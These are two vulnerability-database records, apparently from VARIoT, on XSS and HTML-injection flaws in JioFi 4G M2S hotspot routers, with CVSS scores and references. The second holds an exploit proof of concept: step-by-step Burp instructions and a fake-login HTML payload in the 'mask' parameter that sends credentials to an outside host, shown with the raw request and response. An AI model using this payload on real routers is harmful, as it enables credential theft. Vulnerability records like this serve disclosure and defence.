Vulnerability from variot - Updated: 2023-12-18 13:02JioFi 4G Hotspot M2S devices allow attackers to cause a denial of service (secure configuration outage) via an XSS payload in the SSID name and Security Key fields. JioFi 4G Hotspot M2S The device contains an input validation vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. JioFi 4G Hotspot M2S is a portable wireless router device. There is a security flaw in JioFi 4G Hotspot M2S
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201808-0638",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "4g hotspot m2s",
"scope": "eq",
"trust": 1.6,
"vendor": "jio",
"version": null
},
{
"model": "jiofi m2s",
"scope": null,
"trust": 0.8,
"vendor": "reliance jio infocomm",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-008995"
},
{
"db": "NVD",
"id": "CVE-2018-15181"
},
{
"db": "CNNVD",
"id": "CNNVD-201808-271"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:jio:4g_hotspot_m2s_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:jio:4g_hotspot_m2s:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-15181"
}
]
},
"cve": "CVE-2018-15181",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": true,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 6.8,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.0,
"impactScore": 6.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 6.8,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2018-15181",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 6.8,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.0,
"id": "VHN-125415",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:S/C:N/I:N/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 6.5,
"baseSeverity": "Medium",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2018-15181",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-15181",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201808-271",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-125415",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-125415"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-008995"
},
{
"db": "NVD",
"id": "CVE-2018-15181"
},
{
"db": "CNNVD",
"id": "CNNVD-201808-271"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "JioFi 4G Hotspot M2S devices allow attackers to cause a denial of service (secure configuration outage) via an XSS payload in the SSID name and Security Key fields. JioFi 4G Hotspot M2S The device contains an input validation vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. JioFi 4G Hotspot M2S is a portable wireless router device. There is a security flaw in JioFi 4G Hotspot M2S",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-15181"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-008995"
},
{
"db": "VULHUB",
"id": "VHN-125415"
}
],
"trust": 1.71
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-125415",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-125415"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-15181",
"trust": 2.5
},
{
"db": "EXPLOIT-DB",
"id": "45199",
"trust": 2.5
},
{
"db": "JVNDB",
"id": "JVNDB-2018-008995",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201808-271",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-125415",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-125415"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-008995"
},
{
"db": "NVD",
"id": "CVE-2018-15181"
},
{
"db": "CNNVD",
"id": "CNNVD-201808-271"
}
]
},
"id": "VAR-201808-0638",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-125415"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T13:02:31.307000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "JioFi M2",
"trust": 0.8,
"url": "https://www.jio.com/shop/en-in/jiofi-m2/p/491193575"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-008995"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.1
},
{
"problemtype": "CWE-20",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-125415"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-008995"
},
{
"db": "NVD",
"id": "CVE-2018-15181"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://www.exploit-db.com/exploits/45199/"
},
{
"trust": 1.7,
"url": "https://gkaim.com/cve-2018-15181-vikas-chaudhary/"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-15181"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-15181"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-125415"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-008995"
},
{
"db": "NVD",
"id": "CVE-2018-15181"
},
{
"db": "CNNVD",
"id": "CNNVD-201808-271"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-125415"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-008995"
},
{
"db": "NVD",
"id": "CVE-2018-15181"
},
{
"db": "CNNVD",
"id": "CNNVD-201808-271"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-08-09T00:00:00",
"db": "VULHUB",
"id": "VHN-125415"
},
{
"date": "2018-11-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-008995"
},
{
"date": "2018-08-09T19:29:00.457000",
"db": "NVD",
"id": "CVE-2018-15181"
},
{
"date": "2018-08-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201808-271"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-10-03T00:00:00",
"db": "VULHUB",
"id": "VHN-125415"
},
{
"date": "2018-11-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-008995"
},
{
"date": "2019-10-03T00:03:26.223000",
"db": "NVD",
"id": "CVE-2018-15181"
},
{
"date": "2019-10-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201808-271"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201808-271"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "JioFi 4G Hotspot M2S Vulnerability related to input validation on devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-008995"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201808-271"
}
],
"trust": 0.6
}
}
VAR-201903-0478
Vulnerability from variot - Updated: 2023-12-18 13:02cgi-bin/qcmap_web_cgi on JioFi 4G M2S 1.0.2 devices has XSS and HTML injection via the mask POST parameter. JioFi 4G M2S The device contains a cross-site scripting vulnerability.The information may be obtained and the information may be falsified. There is a security vulnerability in the cgi-bin/qcmap_web_cgi URL in JioFi 4G M2S version 1.0.2.
Exploit Author: Vikas Chaudhary
Date: 21-01-2019
Vendor Homepage: https://www.jio.com/
Hardware Link: https://www.amazon.in/JioFi-Hotspot-M2S-Portable-Device/dp/B075P7BLV5/ref=sr_1_1?s=computers&ie=UTF8&qid=1531032476&sr=1-1&keywords=JioFi+M2S+Wireless+Data+Card++%28Black%29
Version: JioFi 4G Hotspot M2S 150 Mbps Wireless Router
Category: Hardware
Contact: https://www.facebook.com/profile.php?id=100011287630308
Web: https://gkaim.com/
Tested on: Windows 10 X64- Firefox-65.0
CVE-2019-7438
Vulnerability Description => HTML injection is an attack that is similar to Cross-site Scripting (XSS). While in the XSS vulnerability the attacker can inject and execute Javascript code, the HTML injection attack only allows the injection of certain HTML tags. When an application does not properly handle user supplied data, an attacker can supply valid HTML code, typically via a parameter value, and inject their own content into the page. This attack is typically used in conjunction with some form of social engineering, as the attack is exploiting a code-based vulnerability and a user's trust.
Proof Of ConceptoC
1- First Open BurpSuite 2- Make Intercept on 3 -Go to your Wifi Router's Gateway in Browser [i.e http://192.168.225.1 ] 4-Capture the data and then Spider the Host 5- Now You find a Link like like this [ http://192.168.225.1/cgi-bin/qcmap_web_cgi ] 6- Send it to repeter Now you will find parameter like this [ Page=GetWANInfo&mask=0&token=0 ] 7-Vulnerable parameter is => mash 8-Paste this PAYLOAD in mask parameter and then show Response in browser Payload =>
Please login with valid credentials:- It's A Fake Login Page
| Username: | |
| Password: | |
9- You will see a fake Login page on the screen -
Vulnerable URL => Post Based => http://192.168.225.1/cgi-bin/qcmap_web_cgi => mask parameter -
REQUEST
POST /cgi-bin/qcmap_web_cgi HTTP/1.1 Host: 192.168.225.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 Accept: text/plain, /; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.225.1/ Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 550 Connection: close
Page=GetWANInfo&mask=
Please login with valid credentials:- It's A Fake Login Page
| Username: | |
| Password: | |
RESPONSE
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 X-Frame-Options: SAMEORIGIN connection: close Content-Type: text/html Content-Length: 1167 Date: Mon, 21 Jan 2019 18:02:07 GMT Server: lighttpd/1.4.35
{"Page":"GetWANInfo","Mask":"
Please login with valid credentials:- It's A Fake Login Page
| Username: | |
| Password: | |
Show details on source website
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201903-0478",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "jiofi 4g m2s",
"scope": "eq",
"trust": 1.0,
"vendor": "jio",
"version": "1.0.2"
},
{
"model": "jiofi m2s",
"scope": "eq",
"trust": 0.8,
"vendor": "reliance jio infocomm",
"version": "1.0.2"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-003215"
},
{
"db": "NVD",
"id": "CVE-2019-7438"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:jio:jiofi_4g_m2s_firmware:1.0.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:jio:jiofi_4g_m2s:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2019-7438"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Vikas Chaudhary",
"sources": [
{
"db": "PACKETSTORM",
"id": "152625"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-795"
}
],
"trust": 0.7
},
"cve": "CVE-2019-7438",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2019-7438",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-158873",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.1,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2019-7438",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2019-7438",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201903-795",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-158873",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158873"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003215"
},
{
"db": "NVD",
"id": "CVE-2019-7438"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-795"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "cgi-bin/qcmap_web_cgi on JioFi 4G M2S 1.0.2 devices has XSS and HTML injection via the mask POST parameter. JioFi 4G M2S The device contains a cross-site scripting vulnerability.The information may be obtained and the information may be falsified. There is a security vulnerability in the cgi-bin/qcmap_web_cgi URL in JioFi 4G M2S version 1.0.2. \n# Exploit Author: Vikas Chaudhary\n# Date: 21-01-2019\n# Vendor Homepage: https://www.jio.com/\n# Hardware Link: https://www.amazon.in/JioFi-Hotspot-M2S-Portable-Device/dp/B075P7BLV5/ref=sr_1_1?s=computers\u0026ie=UTF8\u0026qid=1531032476\u0026sr=1-1\u0026keywords=JioFi+M2S+Wireless+Data+Card++%28Black%29\n# Version: JioFi 4G Hotspot M2S 150 Mbps Wireless Router\n# Category: Hardware\n# Contact: https://www.facebook.com/profile.php?id=100011287630308\n# Web: https://gkaim.com/\n# Tested on: Windows 10 X64- Firefox-65.0\n# CVE-2019-7438\n***********************************************************************\n## Vulnerability Description =\u003e HTML injection is an attack that is similar to Cross-site Scripting (XSS). While in the XSS vulnerability the attacker can inject and execute Javascript code, the HTML injection attack only allows the injection of certain HTML tags. When an application does not properly handle user supplied data, an attacker can supply valid HTML code, typically via a parameter value, and inject their own content into the page. This attack is typically used in conjunction with some form of social engineering, as the attack is exploiting a code-based vulnerability and a user\u0027s trust. \n----------------------------------------\n# Proof Of ConceptoC\n1- First Open BurpSuite\n2- Make Intercept on \n3 -Go to your Wifi Router\u0027s Gateway in Browser [i.e http://192.168.225.1 ]\n4-Capture the data and then Spider the Host\n5- Now You find a Link like like this [ http://192.168.225.1/cgi-bin/qcmap_web_cgi ]\n6- Send it to repeter Now you will find parameter like this [ Page=GetWANInfo\u0026mask=0\u0026token=0 ]\n7-Vulnerable parameter is =\u003e mash \n8-Paste this PAYLOAD in mask parameter and then show Response in browser \nPayload =\u003e \n\n\u003cdiv style=\"position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index: 1000; background-color:red; padding: 1em;\"\u003e\u003ch1\u003e\u003cfont color=\"white\"\u003ePlease login with valid credentials:- It\u0027s A Fake Login Page\u003cbr\u003e\u003cform name=\"login\" action=\"http://anysite.com/\"\u003e\u003ctable\u003e\u003ctr\u003e\u003ctd\u003eUsername:\u003c/td\u003e\u003ctd\u003e\u003cinput type=\"text\" name=\"username\"/\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003ePassword:\u003c/td\u003e\u003ctd\u003e\u003cinput type=\"text\" name=\"password\"/\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd colspan=2 align=center\u003e\u003cinput type=\"submit\" value=\"Login\"/\u003e\u003c/td\u003e\u003c/tr\u003e\u003c/table\u003e\u003c/form\u003e\u003c/div\u003e\n\n9- You will see a fake Login page on the screen -\n----------------------------------------------------------------------------------\nVulnerable URL =\u003e Post Based =\u003e http://192.168.225.1/cgi-bin/qcmap_web_cgi =\u003e mask parameter -\n----------------------------------------------------------------------------------\nREQUEST \n-------------------\nPOST /cgi-bin/qcmap_web_cgi HTTP/1.1\nHost: 192.168.225.1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0\nAccept: text/plain, */*; q=0.01\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://192.168.225.1/\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 550\nConnection: close\n\nPage=GetWANInfo\u0026mask=\u003cdiv style=\"position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index: 1000; background-color:red; padding: 1em;\"\u003e\u003ch1\u003e\u003cfont color=\"white\"\u003ePlease login with valid credentials:- It\u0027s A Fake Login Page\u003cbr\u003e\u003cform name=\"login\" action=\"http://anysite.com/\"\u003e\u003ctable\u003e\u003ctr\u003e\u003ctd\u003eUsername:\u003c/td\u003e\u003ctd\u003e\u003cinput type=\"text\" name=\"username\"/\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003ePassword:\u003c/td\u003e\u003ctd\u003e\u003cinput type=\"text\" name=\"password\"/\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd colspan=2 align=center\u003e\u003cinput type=\"submit\" value=\"Login\"/\u003e\u003c/td\u003e\u003c/tr\u003e\u003c/table\u003e\u003c/form\u003e\u003c/div\u003e\u0026token=0\n\n****************************\nRESPONSE\n-----------------\n\nHTTP/1.1 200 OK\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\nX-Frame-Options: SAMEORIGIN\nconnection: close\nContent-Type: text/html\nContent-Length: 1167\nDate: Mon, 21 Jan 2019 18:02:07 GMT\nServer: lighttpd/1.4.35\n\n{\"Page\":\"GetWANInfo\",\"Mask\":\"\u003cdiv style=\"position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index: 1000; background-color:red; padding: 1em;\"\u003e\u003ch1\u003e\u003cfont color=\"white\"\u003ePlease login with valid credentials:- It\u0027s A Fake Login Page\u003cbr\u003e\u003cform name=\"login\" action=\"http://anysite.com/\"\u003e\u003ctable\u003e\u003ctr\u003e\u003ctd\u003eUsername:\u003c/td\u003e\u003ctd\u003e\u003cinput type=\"text\" 